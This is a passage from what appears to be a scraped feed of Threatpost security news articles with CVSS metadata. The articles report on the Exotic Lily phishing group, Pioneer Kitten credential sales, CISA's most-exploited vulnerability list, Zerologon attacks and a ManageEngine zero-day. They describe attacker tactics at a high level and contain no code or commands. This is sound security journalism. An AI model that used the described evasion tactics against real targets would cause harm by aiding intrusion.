organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be 